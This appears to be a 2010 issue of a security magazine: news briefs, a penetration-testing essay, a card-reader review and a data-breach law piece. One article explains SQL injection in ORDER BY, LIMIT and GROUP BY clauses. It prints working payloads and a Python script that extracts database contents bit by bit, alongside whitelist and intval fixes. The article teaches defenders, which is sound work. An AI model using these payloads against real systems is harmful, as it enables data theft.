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Enterprise authentication: Increasing security without breaking the bank 




At the beginning of March, seemingly everyone and anyone in the field of information security 
converged at the Moscone Center in San Francisco for the biggest event of the year - RSA 
Conference 2010. Despite the economic downturn, it was a huge and successful show where we 
met many of the security professionals that help us shape the magazine you're reading today. It 
was great to see the industry in full force and a selection of news from the show is available in this 
issue. 

We're gearing up for InfoSec World in Orlando and Infosecurity Europe in London before the next 
issue is out. If you'd like to meet, share your writing with our audience, let me know. 



Mirko Zorz 
Editor in Chief 
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ecurity world 



Waledac disruption only the beginning, says Microsoft 



Even though Microsoft admits that not all communication between 
the C&C centers and the infected bots has been disrupted, Richard 
Boscovich, the senior attorney with the company's Digital Crimes 
Unit, says that "this shows it can be done" and announces other 
operations whose targets and modus operandi will remain secret 
until the deployment, (www.net-security.org/secworld. php?id=8933) 




Can Aurora attacks be prevented? 

A lot has been written already about the "Aurora" attacks on major US compa- 
nies. Speculation about and investigations into the origin of the attack and the 
code used has kept many researchers busy since January. iSec Partners is no 
exception - they have been looking into the vulnerabilities that enabled these 
attacks to happen. The weak link has proved to be the human factor. 
(www.net-security.org/secworld. php?id=8950) 



Log review checklist for security incidents 



5= r 



Anton Chuvakin, the well-known security expert and consultant in the field of 
log management and PCI DSS compliance and author of many books, and 
Lenny Zeltser, leader of the security consulting team at Savvis and senior fac- 
ulty member at SANS, have created a "Critical Log Review Checklist for Secu- 
rity Incidents", (www.net-security.org/secworld. php?id=8994) 
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Mariposa bot distributed by Vodafone's infected phone 



Following the news about the Energizer DUO USB recharger that 
infects PCs with a Trojan, here is another piece of equipment 
whose software comes bundled with malware: the new Vodafone 
HTC Magic with Google's Android OS. The massive infection po- 
tential was commented on by a Panda Security's researcher, who 
says that the phone in question is distributed by Vodafone "to its 
userbase in some European countries and it seems affordable as 
you can get it for 0€ or 1 € under certain conditions." 
(www.net-security.org/secworld. php?id=8991) 



Basic security measures do wonders 

The reality is that even successful hackers are not omnipotent, nor do they 
usually come, hack, and leave without a trace. We actually have multiple tools 
at our disposal that we must start combining to get a clear picture of what's 
normal, so that we can notice when it's not. We have to realize that attack pre- 
vention is attainable in most cases, and start looking. Roger Grimes has some 
good advice on that subject, (www.net-security.org/secworld. php?id=9001) 



Koobface worm doubles its number of command and control servers 

The shut down and recovery of the 
Troyak-as command and control center 
for the active Zeus botnet was good 
news for the whole IT security commu- 
nity. Unfortunately, as some botnets 
struggle, others stay unaffected. 

As part of their relentless effort to stay 
ahead of cybercriminals, Kaspersky 
Lab's research and analysis team have 
recently monitored a surge in Koobface 
C&C servers, the highly prolific worm 
infesting social networking sites. 

(www. net-security.org/malware_news. php?id=1 252) 



Targeted attacks exploiting PDF bugs are soaring 

^ Adobe is having a hard time fighting its bad reputation when it comes to products 
riddled with vulnerabilities. Adobe Reader exploits seem the weapon of choice of 
many a cyber criminal - as can be attested by the statistics regarding the samples 
gathered by F-Secure's Lab. F-Secure has warned long ago about security prob- 
lems plaguing Adobe's most famous software - they even advised users to start us- 
ing an alternative PDF reader. They suggested that part of the problem is that users are unaware 
of the continuous updating they should perform to stay ahead of the criminals. 
(www.net-security.org/secworld. php?id=9006) 






www.insecuremag.com 



6 



The threat landscape is changing, AV fails to adjust 

A testing conducted by NSS Labs presented us with some deplorable results: of 
the seven antivirus products tested two weeks after the IE bug used for breach- 
ing Google was revealed, only McAfee stopped both the original attack AND a 
new variant. These results have once again put the spotlight on the assertion 
that can be heard here and there from various security experts: anti-virus prod- 
ucts are patently inadequate, and even IDS and Web proxies that scan content 
are not enough to protect a network from advanced persistent threats. 
(www.net-security.org/secworld. php?id=901 1 ) 



The rise of amateur-run botnets 

It used to be that cyber criminals were people with a highly technical skill set, but 
this is not the norm anymore. This fact became obvious when news of the take- 
down of the Mariposa botnet and the three men behind it reached the global pub- 
lic. This botnet consisted of almost 13 million zombie computers and was run by 
people who - according to a researcher at Panda Security - didn't have advanced 
hacker skills, but had resources available online and knew how to use them. 
(www.net-security.org/secworld. php?id=901 5) 



Mac OS X ransomware - just a matter of time? 

For years, IT experts have been predicting the advent of threats 
to Mac users that would mirror those faced by the Windows- 
using crowd. While Mac malware does exist, and the users are 
susceptible to social engineering attacks as much as any Win- 
dows user, there is no pressing sense of fear of what the future 
will bring. A portent of things to come was the recent publication 
of a proof-of-concept Mac OS X blocker, accompanied by some 
lively debates on a number of online forums, 
(www. net-security.org/malware_news. php?id=1 256) 



Feds on social networks: What can they do? 

Should law enforcement agents be allowed to go "undercover" on social networks 
and collect information about the suspects? In the real, physical world, they aren't 
allowed to pose as a suspect's spouse, child, parent or best friend - but there are 
no laws stating that this can't be done online. So far, it seems, the officers are 
treating social networks as a smorgasbord of information that is freely offered to 
and tenacious enough to look for it. (www.net-security.org/secworld. php?id=9036) 



Cloud computing: Risks outweigh the benefits 

Research by ISACA has found that a quarter of enterprises that already use 
cloud computing believe that the risks outweigh the benefits, yet still carry on 
regardless. This perhaps recognizes the relative immaturity of cloud computing 
usage and the uncertainty of the balance between risk and reward. 

(www.net-security.org/secworld. php?id=9051) 
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Should major ISPs join the fight against botnets? 




The "de-peering" of the AS-Troyak ISP and its consequent struggle (and rela- 
tive success) to reconnect to the Internet has put into the spotlight the tangled 
web of connections and C&Cs that is one of the main reasons why botnets 
are so hard to disrupt permanently. This recent takedown also proved that 
there are ISPs out there that consciously host and work with bot masters, and 
their thorough planning and organizing of a web that will assure almost bul- 
letproof connectivity is what makes them ideal for this kind of thing. 
(www.net-security.org/secworld. php?id=9039) 



Baby steps for Russian online security 

In a move that mirrors China's from last year, Russia's Coordination Center will 
insist that anybody who applies for a .ru domain - be it an individual or a busi- 
ness - has to hand over a copy of a passport or legal registration papers. They 
hope that this new provision will make criminals give up on trying to register 
the said domains, since background checks will reveal fake identities or, at 
least, make the whole registration process too long, too complicated and too 
costly for them to undertake, (www.net-security.org/secworld. php?id=9053) 



Pushdo Trojan bypasses audio catpchas 



A Webroot researcher came across a variant of the Pushdo bot that makes it pos- 
sible for the computer to bypass audio captchas used by Microsoft's webmail serv- 
ices Hotmail and Live.com, so that the spam containing malicious links could arrive 
undisturbed to the destination. Using these (often whitelisted) email addresses, the 
bot is able to pull down the captchas and provide the correct response that allows 
the emails to be sent. This is the first instance of a Trojan that attempts to bypass 
audio captchas - those trying to do so with visual ones are already old news. 
(www.net-security.org/malware_news. php?id=1 266) 




US legislation to quash cybercrime havens 

A bill was introduced to the US Senate that - if passes - will penalize eco- 
nomically foreign countries that choose not to or fail to put a stop to cyber 
criminal activity originating from within their borders. 

(www.net-security.org/secworld. php?id=9058) 




The rise of Mafia-like cyber crime syndicates 




Gone are the days when the lone hacker operated from the dark of his room 
in order to gain credit and respect form his peers - the hacking business has 
been taken over by money-hungry, Mafia-like cyber crime syndicates in 
which every person has a specific role. Deputy Assistant FBI Director Steven 
Chabinsky, says that cyber crime actually pays so much that people that may 
have initially dabbed in it, are now quitting their day jobs and becoming "ca- 
reer criminals", (www.net-security.org/secworld. php?id=9060) 
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90% of critical Windows 7 vulnerabilities are mitigated by eliminating admin 
rights 

The removal of administrator rights from Windows users is a mitigating 
factor for 90% of critical Windows 7 vulnerabilities, according to re- 
search by BeyondTrust. 

The results demonstrate that as companies migrate to Windows 7 
they'll need to implement a desktop Privileged Identity Management so- 
lution, to reduce the risks from un-patched Microsoft vulnerabilities 
without inhibiting their users' ability to operate effectively. 

(www.net-security.org/secworld. php?id=9068) 



Facebook to share your data with "pre-approved" third-party sites? 

Facebook released a plan to revise its privacy policy again. Among the fea- 
tures they propose to incorporate is one that made a lot of people raise their 
voices in opposition, because it includes sharing your "General information" - 
your and your friends' names, profile pictures, gender, connections, and any 
content snared using the Everyone privacy setting - with third-party websites 
that they pre-approve. 

The draft of the policy says that you will be able to opt-out of all these sites, 
but what really got people upset is that your information is - by default - 
shared with those sites, (www.net-security.org/secworld. php?id=9074) 



The Conficker conundrum 

Security experts estimate that Conficker, a particularly malicious worm, target- 
ing MS Windows, has already infected more than 7 million computers around 
the world. More than a year has passed since Conficker first appeared, yet it is 
still making the news. 

The patch for the vulnerability exploited by Conficker was published by Micro- ^3 ; • ' 
soft in October 2008. Yet more than one year later, Conficker continues to in- 
fect computers using many advanced malware techniques and exploiting the 
Windows MS08-067 service vulnerability, (www.net-security.org/malware_news. php?id=1 270) 



61% of new threats are banker Trojans 

New samples Received at pandaLabs p anc |aLabs published its report analyzing the IT security events 

and incidents of the first three months of the year. The amount of 
new malware in circulation has continued to increase. In this first 
quarter, the most prevalent category was once again banker Tro- 
jans, accounting for 61% of all new malware. The second placed 
category was traditional viruses (15.13%) despite having practi- 
cally disappeared in recent years, 
(www. net-security.org/malware_news. php?id=1 276) 
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The changing face of penetration testing: Evolve or die! 

by David Harper 




Industry analysts say that as much as 75% of all attacks are now targeting 
the application layer. For a long-time we have relied on penetration testing 
to address this threat. 



There are several ways to conduct penetra- 
tion testing: black box testing assumes no 
prior knowledge of the system being tested 
and is often conducted as an outside hacker, 
white box provides the tester with complete 
knowledge of the infrastructure and therefore 
considers the internal threat or someone with 
inside knowledge. 

Grey box testing is variations between the 
two. Whilst the relative merits of these ap- 
proaches are debated, there are a number of 
reasons why penetration testing, as it cur- 
rently stands, is fundamentally flawed. 

1. It isn't deterministic 

Despite the increasing sophistication of the 
tools available, Penetration Testing will still 
come down to two key factors: the skill of the 
tester, and the time he has available. If you 
want to test this theory, the next time you 
commission a penetration test give the tester 
more time and he will find more issues! Alter- 
natively, get two different testers to perform a 



penetration test on the same application and 
you will find that you get a different list of is- 
sues back. 

The reason for this is elementary. A penetra- 
tion test only scratches the surface and it 
doesn't make a detailed examination of every 
entry point and all possible exploits. 

2. It provides the wrong information 

Penetration testing reports are despised by 
the development organization. Let's face it - 
no-one likes to have their hard work picked 
apart, but chiefly because they report vulner- 
abilities based on the URL without giving any 
real advice on the underlying cause. It is then 
left for the developers to ponder the problem, 
consider the possibilities and - often through a 
process of elimination - discover how this re- 
lates to the code that they have developed. 

This, combined with the lack of security 
knowledge within the development organiza- 
tion, makes vulnerabilities difficult to fix. 
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3. It occurs at the wrong time 

The nature of penetration testing means that it 
can only occur at the end of the development 
life-cycle. The problem is that this is really the 
worst possible time to fix an issue. As an or- 
der of magnitude, it is cheaper and quicker to 
fix an issue if it is discovered during develop- 
ment. Indeed, it frequently happens that the 
time to fix any vulnerability discovered is so 
short that the business will release the appli- 
cation into production with known security 
vulnerabilities and expose itself to the associ- 
ated risk or worse, issue it with an ill-devised 
'patch' that may actually introduce more prob- 
lems than it fixes. More than ever before, 
people understand the software security chal- 
lenge, and penetration testing deserves credit 
for helping spread the word. But knowing a 
security problem exists is not the same as 
knowing how to fix it. 

A better way 

Organizations are starting to realize the error 
of their ways and are allocating larger budgets 
to get the code right in the first place than 
proving it is wrong. They have realized the so- 
lution is to embed security activities through 



the software development life-cycle. During 
requirements phase, security requirements 
need to be specified in the same way as other 
business targets. 

During the design phase, the potential threats 
an application is under need to be analyzed 
and the architecture needs to include com- 
pensating controls to mitigate those threats. 
As the code is developed it needs to be 
checked for common coding errors that lead 
to attacks like SQL Injection and Cross-site 
Scripting attacks. During testing the security 
controls need to be fully tested and, yes, you 
still need to perform penetration testing but 
now it's role is a final QA check not as the 
primary means of defense. 

These security activities can't be left to an in- 
dividual project team to define. Organizations 
need to embrace the culture of developing 
software securely. Typically this involves es- 
tablishing a software security assurance 
(SSA) program that is responsible for ensur- 
ing all software is developed to an appropriate 
security standard and also provides resources 
to assist the development teams to meet this 
challenge. 



THE NATURE OF PENETRATION TESTING MEANS THAT IT CAN ONLY OCCUR 
AT THE END OF THE DEVELOPMENT LIFE-CYCLE. 



• It is a given that the organization needs to 
create a holistic program that fits its require- 
ments, since a generic approach is not likely 
to succeed. This is one area where one size 
most definitely does not fit all. Every organiza- 
tion has its own unique culture, technologies, 
and internal processes, and all of these de- 
termine the direction such a program must 
take. 

• Then, there are the people within the organi- 
zation. When securing the applications an or- 
ganization uses, it is a key strategic priority, 
with buy-in from senior management, that the 
staff understand that this is not just a passing 
fad but something that is truly a major direc- 
tive for the organization that will have tangible 
business benefits. It is important that the 
processes defined are not only effective but 
also efficient, so don't add significant over- 



head to the development teams, budgets, and 
timelines. 

• While tools and technology play a critical 
role in the success of an SSA program, they 
are by no means the only cog in this wheel - 
software security practitioners have a variety 
of tools available, ranging from static and dy- 
namic analysis tools to binary analysis and 
fuzzing. That having been said, it is important 
not to ignore supporting risk management and 
governance tools, that ensure continuous 
learning across the organization when, for in- 
stance, new vulnerability types are discov- 
ered. In a large and diverse organization, with 
both internally and externally developed ap- 
plications, when information about vulnerabil- 
ity categories and possible mitigation is 
shared across the board it can avoid the 
same vulnerability showing up elsewhere a 
few months later. 
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But where do you start to set-up an SSA pro- 
gram? What exactly are the appropriate secu- 
rity activities for your organization? In what 
order should you implement these activities? 

This may all sound like a lot of hard work, 
that's aside from the problem of managing 
such a program, but there is help and advice, 
you just have to look and ask for it, and the 
rewards will speak for themselves. 

The Software Assurance Maturity Model 
(SAMM) is an open framework to help organi- 
zations formulate and implement a strategy 
for software security assurance that is tailored 
to the specific risks facing the organization. It 



was defined with flexibility in mind so that it 
can be utilized by small, medium, and large 
organizations using any style of development. 
As an open project, SAMM content will always 
remain vendor-neutral and freely available for 
all to use. Visit www.opensamm.org for more 
information. 

Penetration testers are not suddenly going to 
disappear off the face of the earth. Instead, 
we will see the practice undergo a transforma- 
tion and be reborn as part of a tightly inte- 
grated approach to security. Penetration test- 
ing as a stand alone solution is dead, long live 
penetration testing. 



David Harper is the EMEA Service Director of Fortify Software (www.fortify.com). 
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Review: SmartSwipe 

by Mark Woodstone 

NetSecure Technologies, a Canadian provider of secure e-commerce solu- 
tions, gave us a copy of their flagship product SmartSwipe at the RSA Confer- 
ence 2010 in San Francisco. The device is aimed towards online shoppers 
using Internet Explorer on one of the Microsoft Windows operating systems. 



SmartSwipe is a USB-powered card reader 
that upgrades the typical credit card informa- 
tion typing-in process, by enabling its users to 
simply swipe their card instead. Of course, it 
is not just about making the whole process as 
easy as possible for the users, but about im- 
proving the security of their shopping experi- 
ence as well. 

Some online shopping dangers can be side- 
stepped just by exercising basic security 
awareness, but for more complex threats, us- 
ers will need to use other computers security 
enhancements. By using SmartSwipe, you 
don't have to be afraid of potential physical or 
software keyloggers installed on your com- 
puter, nor do you have to worry about data 
stealing malware applications secretly running 
in the background. 



SmartSwipe uses the company's Dynamic 
SSL technology that works seamlessly with 
the current SSL encryption standards. When 
you swipe your credit/debit card, the data is 
encrypted before entering the computer and 
the appropriate fields in the online checkout 
are automatically "taken over" by SmartSwipe. 

By viewing the HTML source of the credit card 
information input page, you won't be able to 
see anything except empty values' fields. Your 
credit card number and details are safely en- 
crypted and ready to be dispatched via the 
final "Buy" button in the web store. 

SmartSwipe card reader works together with 
its software application to make all of this a 
completely secure process. 



' Payment information: 
C REDI T CARD TYPE ( Please c hoose onel 

S E S3 I 

Visa Mastercard Annex Discover 

o® o® o® g® 



Credit Card Number 



^Protected 



Expi ration Cs:e 

O Obi Me 



Submit Form 
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In this article I will be focusing on practical 
usage information, so if you are interested in 
the technical specifications of Dynamic SSL, 
point your browsers to dynamic-ssl.com. 
SmartSwipe currently works only on Microsoft 
Windows and it requires Internet Explorer. 



The installation is old fashioned, very easy 
and with few things that needed to be config- 
ured. The software application gets added to 
your browser and waits for the user's "call for 
help". When you enter the final phase of your 
shopping and want to checkout, hitting the 
SmartSwipe IE addition will start the swiping 
process. 



Tools Help 



;ted Sites * |T| Web Slice Gallery 



CUCINA 




SMART 



Don't type, Swipe! 

Instead of typing in your card number, 
click this button to swipe your card. 



V SUBSCRIPTION 

icates required field 
Subscription rate: 



1\ Don't show this again. 



Clicking the SmartSwipe button before swiping the card 



At this time, you will encounter one of the 
three possible scenarios: 

1) Site from the database: If the site you are 
using is recognized by SmartSwipe in its da- 
tabase, by swiping the card, all the data will 
get automatically "ghost-filled" and you are 
ready to click on the final "Buy" button. The 
database of sites is constantly being updated, 
so be sure to refresh it via the configuration 
menu. 

2) Site not in the database: If you are trying to 
buy a subscription to an obscure Mediterra- 
nean cooking magazine, you don't have to 



worry. Click on the SmartSwipe button and the 
application will analyze the HTML code and 
after swiping the card, the details will most 
likely be spread around in the right fields. If 
the software has any doubts, it will ask you to 
confirm that all the fields are right. 

3) Insecure site: If you are using a http and 
not an https address for the checkout, the ap- 
plication will let you know that this is danger- 
ous and that you shouldn't proceed. If you ab- 
solutely need to use the site without https, 
SmartSwipe has already washed its hands of 
it and you will need to manually type in the 
details. 



Warning -Security Issue Delected 



3 



SmartSwipe has inspected this website and concluded that it 
may not be secure enough to transmit your credit card 
information. To protect your information, SmartSwipe will not 
attempt to complete this transaction. 



OK 



Security issue warning window 
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I came across a couple of quirks while testing 
SmartSwipe. The first time you start Internet 
Explorer after the SmartSwipe application is 
added, it will take just a couple of seconds 
more for it to load than usual. Also, the soft- 
ware told me that the actual Amazon.com 
SSL certificate was invalid. After restarting IE, 
this problem disappeared. 

The reader works with every major credit card 
and credit/debit card combination including 



Visa, MasterCard, American Express and Dis- 
cover. You can get the device on Amazon.com 
for just under $70. 

SmartSwipe is based on a great concept and 
it works very well. It makes online shopping a 
little bit easier and much more secure. I hope 
that Mozilla Firefox and other non-IE browsers 
support will be included in one of the next 
software updates. 



Mark Woodstone is a security consultant that works for a large Internet Presence Provider (IPP) that serves 
about 4000 clients from 30 countries worldwide. 




I www, t w i tte r. co m/he I p n etsec u r i t y 





SUBSCRIBE TO (IN)SECURE MAGAZINE 

www, insecuremag. com 



www.insecuremag.com 



16 



AppSource Analytics 



AppSourceAnalytics platform is unique hybrid model for web application, site and 
software security. It is Software as a Service (SaaS) for the enterprise. 

Blueinfy has designed and developed a technology platform to assess source code using 
a combination of static source code analysis along with dynamic simulations. The platform 
is capable of processing several different languages and frameworks to determine possible 
security vulnerabilities in enterprise applications and generate accurate reports. 
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Unusual SQL injection vulnerabilities 
and how to exploit them 

by Bogdan Calin 




In this article, I'm going to talk about 'less common' SQL injection vulnerabili- 
ties, and will explain how to exploit them. 



As opposed to the typical SQL injections be- 
ing reported nowadays, in these type of SQL 
injection vulnerabilities, the attacker can con- 
trol the ORDER BY, LIMIT or GROUP BY SQL 
clauses. 

All SQL injection examples in this article are 
using MySQL server as a backend database, 



though similar techniques can also be applied 
to other database servers. 

When it comes to most of today's reported 
SQL injection vulnerabilities, the user typically 
manipulates the part after the WHERE clause 
in the SQL syntax. Usually, the SQL query 
looks something like this: 



SELECT fieldlist 
FROM table 

WHERE field = '<part controlled by user>' ; 



If the application doesn't properly sanitize user 
input, the code is vulnerable to an SQL injec- 
tion. The attacker will need to determine how 
many fields are in the 'fieldlist' column and 



construct a union select sql query to ex- 
tract additional data from the database. The 
final query will look something like this: 



SELECT fieldlist 

FROM table 
WHERE field = ' INVALID VALUE' 



UNION SELECT VERSION () 
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The first part of the query will not return any- 
thing because the condition is false. There- 
fore, the query will only return the version of 
the MySQL database server as a result of the 
second part of the query. However, in this arti- 
cle I will not concentrate on this type of SQL 
injection, since over the years they have been 
extensively documented. 



<?php 

include ' db . php ' ; 



The first uncommon SQL injection vulnerabil- 
ity we'll be looking at in this article is the SQL 
injection in the ORDER BY clause. 

While auditing a popular PHP web application 
recently, I have encountered this type of SQL 
injection and did some research to find out 
how to exploit it. As an example, I will be using 
the following abstract of PHP code: 



if (isset ($_GET["order_by"] ) ) 

$order_by = mysql_escape_string ($_GET [ "order_by" ] ) ; 

else 

$order_by = 1 name 1 ; 

$result = mysql_query ("SELECT * FROM users ORDER BY $order_by") ; 

while ( $row = mysql_f etch_array ($result) ){ 
echo "<b>" . $row["username"] . "</b> - "; 
echo " " .$row["name"] . " - 
echo " " .$row[ "email" ] ; 
echo "<br>" ; 

} 

?> 



As you can see from the above example, the 
user can control how the final results are dis- 
played. By manipulating the GET variable 
"order_by", he can display the results in a 
different order. For example, by requesting the 

URL Vorderby .php?order_by=name' the 

following results will be returned: 

1 - admin - Clear Rivers - admin@email.com 
3 - John - John Smith - john@email.com 

2 - Mary - Mary Smith - mary@email.com 
5 - Adrian - Popescu Adrian - 
adrian@gmail.com 

However, requesting the URL V 

orderby .php?order_by=email , will return 

the results in a different order: 

1 - admin - Clear Rivers - admin@email.com 
5 - Adrian - Popescu Adrian - 
adrian@gmail.com 



3 - John - John Smith - john@email.com 
2 - Mary - Mary Smith - mary@email.com 

In the previous code sample, the developer 
tries to filter the user input by using 

, mysql_escape_string' . However, this pro- 
tection does not work because the user input 
is not enclosed between quotes. Therefore 
this code is vulnerable to SQL injection. Since 
in this example we cannot use union select, 
how can we exploit it? A query like "select * 

FROM users ORDER BY name union select 

version () " will return the following error 
message: 

"Incorrect usage of UNION and ORDER 
BY" . 

The idea is to order the data differently based 
on the result of various boolean conditions. 

The SQL query syntax should be: 



SELECT * FROM users ORDER BY (case when ( {boolean_condition} ) 
then name else email end) 
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Therefore the SQL query for this example will be as follows: 

SELECT * FROM users ORDER BY (case when (1=1) then name else email end) 



In this case the condition (1=1) is true and the By using these boolean conditions, we can 
results will be ordered by name. Therefore, it extract any information we want from the da- 
will return 1 ,3,2,5. However, ' select * from tabase one bit at a time. 

users ORDER BY (case when (1=0) then 

name else email end) ' is false and will re- For example, if we wanted to extract the 

turn 1 ,5,3,2, where the results are ordered by password of the administrator we could use 

email. queries like: 

SELECT * FROM users ORDER BY (case when (ORD (MID ( (select password 

from users where id=l) , 1 , 1) ) &1>0) then name else email end) 

This query will return TRUE (results ordered To extract the second bit we will use the fol- 

by name) if the first bit from the first character lowing query: 
of the password is 1 and FALSE (results or- 
dered by email) is 0. 

SELECT * FROM users ORDER BY (case when (ORD (MID ( (select password 

from users where id=l) , 1 , 1) ) &2>0) then name else email end) 

and so on. Therefore trying to extract the re- created a small Python script that will extract 

quired data manually can be a lengthy proc- any information from the database using the 

ess, therefore it needs to be automated. I've technique described above. 



Z: \bld01\insecLLrematf >c : \Py t lion26\python orderby.py "select uersionO" 
f»l ORDER BV data extractor ChogfdanPacunetix.con) f ♦ 1 
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Here is the source code for this script: 

# ORDER BY data extractor (bogdan [at] acunetix.com) 
import httplib, urllib, sys , string 

from string import replace 

# various configuration parameters 
HOSTNAME = "bldOl" 

PORT = "80" 

URL = "/insecuremag/orderby .php?order_by=" 

# the string that is returned when the condition is true 

TRUE_STRING = "1 - <b>admin</b> - Clear Rivers - admin@email . com<br> 3 
- <b>John</b>" 

# function to perform the actual data extraction using boolean queries 
def extract_data (extract_data_query) : 

print "Query: " + extract_data_query 
result = "" 

# bits array 

bits = [1, 2, 4, 8, 16, 32, 64, 128] 
char = 1 

while (1) : 
i = 0 
value = 0 

while (i < 8) : 

# prepare request 

hi = httplib. HTTPConnection (HOSTNAME, PORT, timeout=20) 
params = { } 

# http headers 

headers = {"Host": HOSTNAME, 
"Accept": "*/*", 

"User-Agent": "Mozilla/4.0 (Acunetix WVS) " } 

# prepare SQL query 

query = "(case when (0RD(MID((" + extract_data_query + ")," 
+ str (char) + " ,1) ) & " + \ 

str(bits[i]) + " >0) then name else email end)" 

# make HTTP request 

hi . request ( "GET" , URL + urllib . quote_plus (query) , params, 

headers) 

try: 

rl = hi .getresponse () 
except : 

print "error ..." 
sys. exit () 

# check HTTP status code (we are looking for a 200 response) 
if rl. status <> 200: 

print "invalid status code: " + str (rl . status) 
sys. exit () 
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# good status code, move on 
data = rl . read ( ) 



# determine bit value based on data, search true string 
if string. find (data, TRUE_STRING) != -1: 
print "1", 

value = value + bits[i] 
else : 

print "0", 



hi . close () 



# move to the next bit 
i = i + 1 



# game over? 
if value == 0 : 

print " DONE" 

return result 
else : 

print " => " + str (value) +"=>'"+ chr (value) + 

# save the current char, move on to the next one 
result = result + chr (value) 
char = char + 1 



# main function 
def main ( ) : 

# check for input params 
if len ( sys . argv) <=1 : 

print "usage orderby.py SQL_QUERY_TO_EXTRACT_DATA" 
sys. exit () 

query = sys. argv [1] 

print " [*] ORDER BY data extractor (bogdan [at] acunetix.com) [*] " 
print "" 

# extract the data 

data = extract_data (query) 
print "" 

print "result => " + data 



if name == 1 main 

main ( ) 



How do you protect against this vulnerability? possible values for the "order_by" input. 
One solution would be to use a white list of Example: 



$possible_values = array ( "name" , "email", "id", "username"); 
if ( ! in_array (strtolower ($_GET [ "order_by" ] ) , $possible_values) ) { 
die ( " invalid value ! " ) ; 

} 

$order_by = strtolower ($_GET [ "order_by" ]) ; 
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SQL injections in the LIMIT clause 



Let's take a look at the sample source code below: 
<?php 

include ' db . php ' ; 

if (isset ($_GET ["limit"] ) ) 

$limit = mysql_escape_string($_GET ["limit"] ) ; 

else 

$limit = ' 3 ' ; 



$result = mysql_query ( "SELECT * FROM users LIMIT $limit") ; 

while ( $row = mysql_f etch_array ($result) ){ 
echo "<b>" .$row["username"] . "</b> - "; 
echo " " .$row["name"] . " - "; 
echo " " .$row[ "email" ] ; 
echo "<br>"; 

} 

?> 



This code is again vulnerable to SQL injection 
but this time the injection is in the LIMIT 
clause. However, this is not as complicated to 
exploit as the previous case. We can use 



union select. By requesting the URL 

/insecuremag/limit . php?limit=2+union+ 
select+1, 2, version () , 4 , 5 , 6, 7 , 8 the SQL 

query becomes: 



select * from users limit 2 union select 1 , 2 , version ( ) , 4 , 5 , 6 , 7 , 8 



and we receive the following results: 

admin - Clear Rivers - admin@email.com 
Mary - Mary Smith - mary@email.com 
2 - 5.0.67-0ubuntu6 - 4 

Therefore it's very easy to extract information 
from the database when you control the LIMIT 
clause. To protect yourself against this attack 
you need to better sanitize the "limit" variable. 



Instead Of $limit = mysql_escape_s- 
tring ( $_GET [ " limit"] ) yOU COUld USe 
$limit = intval ($_GET[ "limit" ] ) to 

make sure the value is a number. 

SQL injections in the GROUP BY clause 

This situation is identical with the LIMIT case, 
you can use UNION SELECT to extract the 
data. For example, the following query works 
great on MySQL: 



select * from users group by id union select 1 , 2 , version ( ) , 4 , 5 , 6 , 7 , 8 



The protection is identical with the one from 
the ORDER BY clause (you need to define a 
whitelist of allowed fields). 

Conclusion 

There are situations where "mysqi_es- 
cape_string" will not protect you from SQL 



injection. mysql_escape_string doesn't 

work in any of the cases presented above be- 
cause the user input in not enclosed between 
quotes. In these cases you need to manually 
validate the user input and decide what is al- 
lowed and what not. 



Bogdan Calin started working for GFI, where he was the lead developer behind LANguard Network Security 
Scanner. Currently Bogdan is a CTO at Acunetix, where he forms part of the Acunetix Web Vulnerability Scan- 
ner team. Bogdan Calin can be reached via email at bogdan [at] acunetix.com. 
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Here are some of the Twitter feeds we follow closely and can recommend to anyone interested in 
learning more about security as well as engaging in interesting conversations on the subject. If 
you want to suggest an account to be added to this list, send a message to @helpnetsecurity on 
Twitter. Our favorites for this issue are: 

@stiennon 

Richard Stiennon - Security analyst, blogger, writer, speaker. 
http://twitter.com/stiennon 

©Brian Honan 

Brian Honan - Infosec consultant, blogger, author, founder and head of Ireland's CSIRT. 

http://twitter.com/BrianHonan 

@securityninja 

Doing application security in the product management team at Realex Payments. 

http://twitter.com/securityninja 
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Security 




Now Available at a Browser Near You 

Software-as-a-Service (SaaS) has been described as 
the most disruptive delivery model to ever face the enterprise 
software market for one simple reason: it works 



Qualys is the first company to deliver an on demand solution for security risk and compliance 
management. QualysGuard*' is the widest deployed security on demand platform in the world, 
performing over 150 million IP audits per year — with no software to install and maintain. 

For a free trial, go to a browser near you. 

www.qualys.com/SaaSTrial 

ffl Qualys 
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Take note of new data 
notification rules 

by Nick Lowe 





Data security breaches will soon be punishable by big fines as new legislation 
comes into effect. How do you protect sensitive customer data against losses, 
and keep the data watchdogs friendly? 



A data watchdog? More like a puppy - that's 
the criticism that has often been aimed at 
Britain's data regulator, the Information Com- 
missioner's Office (ICO). In 2008 and 2009, 
even though it reported on 720 data breaches 
from businesses, government bodies and 
charities in the UK, the strongest sanction the 
ICO could take against these organizations 
was to issue warnings and enforcement no- 
tices. 

But from April this year, the ICO will gain real 
teeth, in the form of a £500,000 ($750,000) 
fine for companies that breach the UK Data 
Protection Act (DPA) through 'reckless or ma- 
licious' practice. 

This is just the start of tough new data secu- 
rity sanctions in Europe. In October 2009, the 
European Union agreed on new rules regard- 
ing the reporting of breaches. While this cur- 
rently applies to telecom providers and ISPs, 



the EU is committed to extending breach noti- 
fication to all firms that process personal data 

- banks, building societies, insurers, brokers 

- with the draft legislation presented this year. 

Notification costs 

Notification means informing the national 
regulator and all parties affected by the 
breach. This sounds simple enough, but the 
costs are punitive. The precedent has been 
well established by the California SB 1386 
data breach disclosure law, introduced in 
2002, and with similar laws now in force in 
most North American states. 

In many cases, meeting notification demands 
has a far greater financial impact than a fine, 
or the costs of fixing the data breach. Gartner 
estimates that organizations spend on aver- 
age $90 for each individual personal record 
lost in each separate data breach. 
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The Ponemon Institute states the cost is still 
higher, at up to $140 per record, per breach. 
You do the math, as they say. 

Dishonored in the breach 

These regulatory moves have been driven by 
the ongoing data breaches, and by the slow 
uptake of endpoint security solutions that 
would help to prevent breaches from happen- 
ing. In December 2009, we surveyed UK 
companies in both the public and private sec- 
tor on their use of data encryption. Less than 
50% used encryption on company laptops 
and mobile devices. This figure is almost iden- 
tical to the results of a similar survey we did in 
November 2007. 



So it's no surprise that international regulatory 
bodies feel it necessary to introduce tougher 
legislative measures against organizations 
that handle data in a careless or reckless way. 

When the UK Deputy Information Commis- 
sioner welcomed the ICO's new powers, he 
also made the intentions behind them crystal 
clear. The statement read: "We are keen to 
encourage organizations to achieve better 
data protection compliance, and we expect 
that the prospect of a significant fine for reck- 
less or deliberate data breaches will focus 
minds at board level." 



DATA WATCHDOGS ARE RAPIDLY GETTING THE BITE 
TO ACCOMPANY THEIR BARK, WITH THE ABILITY TO 
APPLY BOTH HEFTY FINES AND NOTIFICATION COSTS. 



Calling off the (watch)dogs 

